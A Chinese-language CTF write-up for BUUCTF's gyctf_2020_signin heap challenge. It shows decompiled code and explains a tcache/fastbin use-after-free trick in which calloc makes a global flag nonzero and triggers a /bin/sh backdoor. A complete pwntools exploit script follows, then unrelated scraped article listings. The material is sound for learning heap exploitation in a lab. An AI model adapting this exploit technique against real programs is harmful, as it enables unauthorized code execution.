Ubuntu18.04的题

用到了两个特性:

一个是 calloc 的特点:不会分配 tcache chunk 中的 chunk

另一个是 tcache 的特点:在分配 fastbin 中的 chunk 时,若还有其他相同大小的 fastbin_chunk 并且 tcache 还没满时,会将其全部放入 tcache 里。

menu:

 1 unsigned __int64 menu()

 2 {

 3   int choice; // eax

 4   __int64 s[3]; // [rsp+0h] [rbp-20h] BYREF

 5   unsigned __int64 v3; // [rsp+18h] [rbp-8h]

 6

 7   v3 = __readfsqword(0x28u);

 8   printf("your choice?");

 9   s[0] = 0LL;

10   s[1] = 0LL;

11   memset(s, 0, 0x10uLL);

12   read(0, s, 0xFuLL);

13   choice = atoi((const char *)s);

14   if ( choice == 2 )

15   {

16     edit();

17   }

18   else if ( choice > 2 )

19   {

20     if ( choice != 3 )

21     {

22       if ( choice == 6 )

23         backdoor();

24       goto LABEL_12;

25     }

26     del();

27   }

28   else

29   {

30     if ( choice != 1 )

31     {

32 LABEL_12:

33       puts("no such choice!");

34       return __readfsqword(0x28u) ^ v3;

35     }

36     add();

37   }

38   return __readfsqword(0x28u) ^ v3;

39 }

add:

unsigned __int64 add()

{

  unsigned int v1; // [rsp+Ch] [rbp-24h]

  __int64 s[3]; // [rsp+10h] [rbp-20h] BYREF

  unsigned __int64 v3; // [rsp+28h] [rbp-8h]

  v3 = __readfsqword(0x28u);

  puts("idx?");

  s[0] = 0LL;

  s[1] = 0LL;

  memset(s, 0, 0x10uLL);

  read(0, s, 0xFuLL);

  v1 = atoi((const char *)s);

  if ( addcnt >= 0 && v1 <= 0xF )

  {

    ptrlist[v1] = malloc(0x70uLL);    //堆块大小固定fastbin

    flags[v1] = 1;

    --addcnt;

  }

  return __readfsqword(0x28u) ^ v3;

}

delete:

unsigned __int64 del()

{

  unsigned int v1; // [rsp+Ch] [rbp-24h]

  __int64 s[3]; // [rsp+10h] [rbp-20h] BYREF

  unsigned __int64 v3; // [rsp+28h] [rbp-8h]

  v3 = __readfsqword(0x28u);

  puts("idx?");

  s[0] = 0LL;

  s[1] = 0LL;

  memset(s, 0, 0x10uLL);

  read(0, s, 0xFuLL);

  v1 = atoi((const char *)s);

  if ( v1 <= 0xF && flags[v1] == 1 )

  {

    free((void *)ptrlist[v1]);        //UAF

    flags[v1] = 0;

  }

  return __readfsqword(0x28u) ^ v3;

}

edit:

unsigned __int64 edit()

{

  int v1; // [rsp+Ch] [rbp-24h]

  __int64 s[3]; // [rsp+10h] [rbp-20h] BYREF

  unsigned __int64 v3; // [rsp+28h] [rbp-8h]

  v3 = __readfsqword(0x28u);

  if ( cnt >= 0 )

  {

    puts("idx?");

    s[0] = 0LL;

    s[1] = 0LL;

    memset(s, 0, 0x10uLL);

    read(0, s, 0xFuLL);

    v1 = atoi((const char *)s);

    read(0, (void *)ptrlist[v1], 0x50uLL);

    --cnt;

  }

  return __readfsqword(0x28u) ^ v3;

}

backdoor:

void __noreturn backdoor()

{

  calloc(1uLL, 0x70uLL);

  if ( ptr )

    system("/bin/sh");

  exit(0);

}

我们先连续申请8个,然后依次释放,会填满 tcache_chunk 并且还有一个被放到 fastbin 中。

然后我们申请一个回来,在 tcache 里预留一个空位给ptr

利用 UAF 修改 fastbin 的 fd 指针指向 prt-0x10,那么 calloc 时会从 fastbin 里分配一个堆,并且认为 prt-0x10,也是一个 chunk,会把它挂在 tcache 里 ,而 tcache 的 next 指向的是上一个 tcache 的 next 处(fastbin 的 fd 会指向上一个的 chunk 头处),使prt 非零,getshell。

exp:

 1 from pwn import *

 2 context.arch='amd64'

 3 context.log_level = 'debug'

 4

 5 #s=remote("node4.buuoj.cn",29764)

 6 s=process('./1')

 7

 8 def add(idx):

 9     s.sendlineafter(b'your choice?',b'1')

10     s.sendlineafter(b'idx?',str(idx))

11

12 def edit(idx,context):

13     s.sendlineafter(b'your choice?',b'2')

14     s.sendlineafter(b'idx?',str(idx))

15     s.send(context)

16

17 def delete(idx):

18     s.sendlineafter(b'your choice?',b'3')

19     s.sendlineafter(b'idx?',str(idx))

20

21 ptr=0x4040C0

22

23 for i in range(8):

24     add(i)

25

26 for i in range(8):

27     delete(i)

28

29 add(8)

30 edit(7,p64(ptr-0x10))

31 gdb.attach(s)

32 s.sendlineafter(b'your choice?',b'6')

33

34

35 s.interactive()

tcache BUUCTF gyctf_2020_signin的更多相关文章

  1. Buuctf刷题:部分

    get_started_3dsctf_2016 关键词:ROP链.栈溢出.mprotect()函数 可参考文章(优质): https://www.cnblogs.com/lyxf/p/12113401 ...

  2. Pwn Heap With Tcache

    Pwn Heap With Tcache 前言 glibc 2.26 开始引入了 tcache , 相关的 commit 可以看 这里 .加入 tcache 对性能有比较大的提升,不过由于 tcach ...

  3. 由一道CTF pwn题深入理解libc2.26中的tcache机制

    本文首发安全客:https://www.anquanke.com/post/id/104760 在刚结束的HITB-XCTF有一道pwn题gundam使用了2.26版本的libc.因为2.26版本中加 ...

  4. 刷题记录:[BUUCTF 2018]Online Tool

    目录 刷题记录:[BUUCTF 2018]Online Tool 一.知识点 1.escapeshellarg和escapeshellcmd使用不当导致rce 刷题记录:[BUUCTF 2018]On ...

  5. BUUCTF 部分wp

    目录 Buuctf crypto 0x01传感器 提示是曼联,猜测为曼彻斯特密码 wp:https://www.xmsec.cc/manchester-encode/ cipher: 55555555 ...

  6. buuctf misc 刷题记录

    1.金三胖 将gif分离出来. 2.N种方法解决 一个exe文件,果然打不开,在kali里分析一下:file KEY.exe,ascii text,先txt再说,base64 图片. 3.大白 crc ...

  7. BUUCTF知识记录

    [强网杯 2019]随便注 先尝试普通的注入 发现注入成功了,接下来走流程的时候碰到了问题 发现过滤了select和where这个两个最重要的查询语句,不过其他的过滤很奇怪,为什么要过滤update, ...

  8. buuctf misc wp 01

    buuctf misc wp 01 1.金三胖 2.二维码 3.N种方法解决 4.大白 5.基础破解 6.你竟然赶我走 1.金三胖 root@kali:~/下载/CTF题目# unzip 77edf3 ...

  9. buuctf misc wp 02

    buuctf misc wp 02 7.LSB 8.乌镇峰会种图 9.rar 10.qr 11.ningen 12.文件中的秘密 13.wireshark 14.镜子里面的世界 15.小明的保险箱 1 ...

随机推荐

  1. 【leetcode】208. Implement Trie (Prefix Tree 字典树)

    A trie (pronounced as "try") or prefix tree is a tree data structure used to efficiently s ...

  2. HelloWorldModelMBean

    package mbeanTest; import java.lang.reflect.Constructor; import javax.management.Descriptor; import ...

  3. maven根据profile,resources,filters来区分部署环境

    项目过程中,在不同的阶段,分别需要部署开发环境,测试环境,线上环境.如果都用一套配置文件,很容易弄乱,所以维持多套配置文件很有必要. maven提供了一组属性以供开发人员灵活搭配,可以根据环境来打包, ...

  4. 如何使用redis作为缓存,增强用户访问数据的用户体验

    /**完成步骤 1.创建关系型数据库mysql的Provice库,同时启动nosql系列的redis数据库 2.创建项目,导入相关的jar包 3.创建jedis/utils/domain/dao/se ...

  5. 【C/C++】从矩阵左上角走到右下角

    tx的笔试,但是只过了10%,就离谱 #include <bits/stdc++.h> using namespace std; const int maxn = 1010; long d ...

  6. testng 执行多个suite

    我们知道testng的配置文件,一个.xml里面只能有一个suite,那么如果想要设置多个suite怎么弄呢?这个时候我们需要用到testng的标签<suite-files>. 下面说一下 ...

  7. Apache log4j2 远程代码执行漏洞复现👻

    Apache log4j2 远程代码执行漏洞复现 最近爆出的一个Apache log4j2的远程代码执行漏洞听说危害程度极大哈,我想着也来找一下环境看看试一下.找了一会环境还真找到一个. 漏洞原理: ...

  8. [BUUCTF]PWN12——[BJDCTF 2nd]r2t3

    [BUUCTF]PWN12--[BJDCTF 2nd]r2t3 题目网址:https://buuoj.cn/challenges#[BJDCTF%202nd]r2t3 步骤: 例行检查,32位,开启了 ...

  9. Table.NestedJoin合并…Join(Power Query 之 M 语言)

    数据源: "销量表"和"部门表"两个查找表,每个表中都有"姓名"列 目标: 根据"姓名列"将"部门表" ...

  10. MySQL查看数据库连接数

    mysql> show status like 'Threads%' -> ; +-------------------+-------+ | Variable_name | Value ...